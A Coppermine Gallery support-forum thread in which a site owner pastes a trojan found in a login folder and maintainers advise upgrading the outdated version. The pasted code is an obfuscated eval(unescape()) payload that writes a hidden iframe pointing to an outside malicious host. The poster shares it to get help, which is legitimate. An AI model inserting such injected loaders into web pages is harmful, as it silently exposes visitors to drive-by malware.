Print Page - unautorizied script in LOG IN

Title: unautorizied script in LOG IN
Post by: Laki on December 22, 2007, 08:24:37 PM

I had Trojan virus installed in my Login folder. I removed it, but how to protect it in the future???

Script looks like this:
EOT;

</form>
<script language="javascript" type="text/javascript">

</script>

?><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%64%63%31%32%35%65%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%78%2d%76%69%63%74%6f%72%79%2e%72%75%2f%66%6f%72%75%6d%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%38%37%34%36%30%29%2b%27%37%5c%27%20%77%69%64%74%68%3d%37%32%31%20%68%65%69%67%68%74%3d%32%36%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Thanx, Laki.

Title: Re: unautorizied script in LOG IN
Post by: François Keller on December 22, 2007, 10:25:31 PM

what coppermine version do you run ?

Title: Re: unautorizied script in LOG IN
Post by: Laki on January 09, 2008, 07:50:44 AM

version v1.4.10

Title: Re: unautorizied script in LOG IN
Post by: Joachim Müller on January 09, 2008, 08:09:54 AM

Always keep your coppermine version (and all other pre-made scripts you have) up-to-date. Most recent stable coppermine release currently is cpg1.4.14. The fact that your site was hacked may be related to your reluctance to upgrade in time. Do upgrade now!

Title: Re: unautorizied script in LOG IN
Post by: Laki on February 06, 2008, 07:11:19 AM

Thank you Mueller ;D

Title: Re: unautorizied script in LOG IN
Post by: Joachim Müller on February 06, 2008, 08:32:44 PM

The name is "Joachim". Marking thread as "solved".

coppermine-gallery.com/forum

Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: Laki on December 22, 2007, 08:24:37 PM